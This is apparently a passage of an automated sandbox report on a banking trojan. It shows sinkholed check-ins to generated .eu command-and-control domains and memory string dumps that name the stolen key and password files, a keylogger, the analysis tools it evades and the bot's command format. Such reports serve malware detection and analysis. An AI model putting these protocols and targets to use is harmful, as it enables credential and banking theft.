X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:57 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
HTTP/1.1 404 Not Found..Server: nginx 1.1.19..Date: Fri, 02 Sep 2016 17:41:37 GMT..X-Malware-Sinkhole: Arbor Networks..Connection: close..HTTP/1.1 404 Not Found..Server: nginx 1.1.19..Date: Fri, 02 Sep 2016 17:41:37 GMT..X-Malware-Sinkhole: Arbor Networks..Connection: close..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_532_rwx_02250000_000B2000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PASSu98V
PASSu98V
PASSu08V
PASSu08V
FTPQ
FTPQ
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.8.14
4.8.14
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
\firefox.exe
\firefox.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
\wclnt.exe
\wclnt.exe
internal_wutex_0xx
internal_wutex_0xx
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current
Explorer.EXE_532_rwx_02AF0000_000B8000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PASSu98V
PASSu98V
PASSu08V
PASSu08V
FTPQ
FTPQ
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.8.14
4.8.14
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
\firefox.exe
\firefox.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
